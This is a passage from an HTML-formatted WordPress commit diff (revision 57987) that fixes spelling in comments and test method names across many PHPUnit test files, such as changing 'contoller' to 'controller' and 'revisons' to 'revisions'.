</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'update1', get_post_meta( $post_id, 'meta_revision_test', true ) );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> update_post_meta( $post_id, 'meta_revision_test', 'update2' );
</span></span></pre></div>
<a id="trunktestsphpunittestspostnavmenuphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/nav-menu.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/nav-menu.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/nav-menu.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -764,7 +764,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Run tests required to confrim Walker_Nav_Menu receives an $args object.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Run tests required to confirm Walker_Nav_Menu receives an $args object.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function confirm_nav_menu_item_args_object( $args ) {
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertIsObject( $args );
</span></span></pre></div>
<a id="trunktestsphpunittestspostobjectsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/objects.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/objects.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/objects.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -28,7 +28,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'dummy', get_post_meta( $id, 'post_type', true ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'post', $post->post_type );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Excercise the output argument.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Exercise the output argument.
</ins><span class="cx" style="display: block; padding: 0 10px"> $post = get_post( $id, ARRAY_A );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertIsArray( $post );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'post', $post['post_type'] );
</span></span></pre></div>
<a id="trunktestsphpunittestspostqueryphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/query.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/query.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/query.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -725,9 +725,9 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $q->posts = $posts;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $methd = new ReflectionMethod( 'WP_Query', 'set_found_posts' );
- $methd->setAccessible( true );
- $methd->invoke( $q, array( 'no_found_rows' => false ), array() );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $method = new ReflectionMethod( 'WP_Query', 'set_found_posts' );
+ $method->setAccessible( true );
+ $method->invoke( $q, array( 'no_found_rows' => false ), array() );
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( $expected, $q->found_posts );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestsposttypesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/types.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/types.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/types.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -586,7 +586,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 34010
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_get_post_types_by_support_non_existant_feature() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_get_post_types_by_support_non_existent_feature() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSameSets( array(), get_post_types_by_support( 'somefeature' ) );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestspostwpAfterInsertPostphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/post/wpAfterInsertPost.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/post/wpAfterInsertPost.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/post/wpAfterInsertPost.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -166,7 +166,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 45114
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_update_via_rest_contoller() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_update_via_rest_controller() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px"> $post_id = self::$post_id;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -184,7 +184,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 45114
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_new_post_via_rest_contoller() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_new_post_via_rest_controller() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $request = new WP_REST_Request( 'POST', sprintf( '/wp/v2/posts' ) );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -206,7 +206,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 45114
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_update_attachment_via_rest_contoller() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_update_attachment_via_rest_controller() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px"> $attachment_id = self::$attachment_id;
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestsprivacywpPrivacyGeneratePersonalDataExportFilephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/privacy/wpPrivacyGeneratePersonalDataExportFile.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -61,7 +61,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Set up the test fixture.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Override `wp_die()`, pretend to be Ajax, and suppress `E_WARNING`s.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Override `wp_die()`, pretend to be Ajax, and suppress warnings.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 5.2.0
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span></span></pre></div>
<a id="trunktestsphpunittestsqueryinvalidQueriesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/query/invalidQueries.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/query/invalidQueries.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/query/invalidQueries.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -98,7 +98,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Test WP Query with an invalid post type in a mutiple post type query.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Test WP Query with an invalid post type in a multiple post type query.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 48556
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span></span></pre></div>
<a id="trunktestsphpunittestsquerysearchphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/query/search.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/query/search.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/query/search.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -280,7 +280,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_status' => 'publish',
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_title' => '0',
</span><span class="cx" style="display: block; padding: 0 10px"> 'post_content' => 'this post contains zeroes',
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'post_excerpt' => 'this post containts zeroes',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'post_excerpt' => 'this post contains zeroes',
</ins><span class="cx" style="display: block; padding: 0 10px"> )
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -408,7 +408,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Unfiltered search queries for attachment post types should not inlcude
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Unfiltered search queries for attachment post types should not include
</ins><span class="cx" style="display: block; padding: 0 10px"> * filenames to ensure the postmeta JOINs don't happen on the front end.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 22744
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestapplicationpasswordscontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-application-passwords-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -848,7 +848,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Checks the password response matches the exepcted format.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Checks the password response matches the expected format.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @since 5.6.0
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestglobalstylesrevisionscontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-global-styles-revisions-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -590,13 +590,13 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Tests that the default query should fetch all revisions.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Duplicate of WP_Test_REST_Revisions_Controller::test_get_items_default_query_should_fetch_all_revisons
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Duplicate of WP_Test_REST_Revisions_Controller::test_get_items_default_query_should_fetch_all_revisions
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 58524
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers WP_REST_Global_Styles_Controller::get_items
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_get_items_default_query_should_fetch_all_revisons() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_get_items_default_query_should_fetch_all_revisions() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$admin_id );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $expected_count = $this->total_revisions;
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestrevisionscontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-revisions-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -668,7 +668,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 40510
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_get_items_default_query_should_fetch_all_revisons() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_get_items_default_query_should_fetch_all_revisions() {
</ins><span class="cx" style="display: block; padding: 0 10px"> wp_set_current_user( self::$editor_id );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $expected_count = $this->total_revisions;
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestserverphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-server.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-server.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-server.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2002,9 +2002,9 @@
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 50244
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @dataProvider data_batch_v1_optin
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @dataProvider data_batch_v1_opt_in
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_batch_v1_optin( $allow_batch, $allowed ) {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_batch_v1_opt_in( $allow_batch, $allowed ) {
</ins><span class="cx" style="display: block; padding: 0 10px"> $args = array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'methods' => 'POST',
</span><span class="cx" style="display: block; padding: 0 10px"> 'callback' => static function () {
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -2045,7 +2045,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function data_batch_v1_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function data_batch_v1_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> return array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'missing' => array( null, false ),
</span><span class="cx" style="display: block; padding: 0 10px"> 'invalid type' => array( true, false ),
</span></span></pre></div>
<a id="trunktestsphpunittestsrestapirestthemescontrollerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/rest-api/rest-themes-controller.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -934,7 +934,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_wp_block_styles_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_wp_block_styles_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'wp-block-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'wp-block-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -958,7 +958,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_align_wide_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_align_wide_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'align-wide' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'align-wide' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -982,7 +982,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_editor_styles_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_editor_styles_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'editor-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'editor-styles' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1006,7 +1006,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 49037
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_theme_dark_editor_style_optin() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_theme_dark_editor_style_opt_in() {
</ins><span class="cx" style="display: block; padding: 0 10px"> remove_theme_support( 'dark-editor-style' );
</span><span class="cx" style="display: block; padding: 0 10px"> add_theme_support( 'dark-editor-style' );
</span><span class="cx" style="display: block; padding: 0 10px"> $response = self::perform_active_theme_request();
</span></span></pre></div>
<a id="trunktestsphpunittestsscriptmoduleswpScriptModulesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/script-modules/wpScriptModules.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/script-modules/wpScriptModules.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/script-modules/wpScriptModules.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -415,7 +415,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Tests that static dependencies of dynamic depenendencies are not preloaded.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Tests that static dependencies of dynamic dependencies are not preloaded.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 56313
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span></span></pre></div>
<a id="trunktestsphpunittestssitemapssitemapsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/sitemaps/sitemaps.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/sitemaps/sitemaps.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/sitemaps/sitemaps.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -95,7 +95,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * Helper function to get all sitemap entries data.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @return array A list of sitemap entires.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @return array A list of sitemap entries.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function _get_sitemap_entries() {
</span><span class="cx" style="display: block; padding: 0 10px"> $entries = array();
</span></span></pre></div>
<a id="trunktestsphpunitteststermcachephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/term/cache.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/term/cache.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/term/cache.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -55,7 +55,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 14485
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_hierachy_invalidation() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_hierarchy_invalidation() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $tax = 'burrito';
</span><span class="cx" style="display: block; padding: 0 10px"> register_taxonomy( $tax, 'post', array( 'hierarchical' => true ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertTrue( get_taxonomy( $tax )->hierarchical );
</span></span></pre></div>
<a id="trunktestsphpunitteststhemewpThemeJsonphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/theme/wpThemeJson.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/theme/wpThemeJson.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/theme/wpThemeJson.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -4754,7 +4754,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Tests the core separator block outbut based on various provided settings.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Tests the core separator block output based on various provided settings.
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 56903
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 58550
</span></span></pre></div>
<a id="trunktestsphpunitteststhemephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/theme.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/theme.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/theme.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -322,7 +322,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> // Template file that doesn't exist.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $this->assertSame( '', get_query_template( 'nonexistant' ) );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $this->assertSame( '', get_query_template( 'nonexistent' ) );
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> // Template files that do exist.
</span><span class="cx" style="display: block; padding: 0 10px"> foreach ( $theme['Template Files'] as $path ) {
</span></span></pre></div>
<a id="trunktestsphpunittestsusercapabilitiesphp"></a>
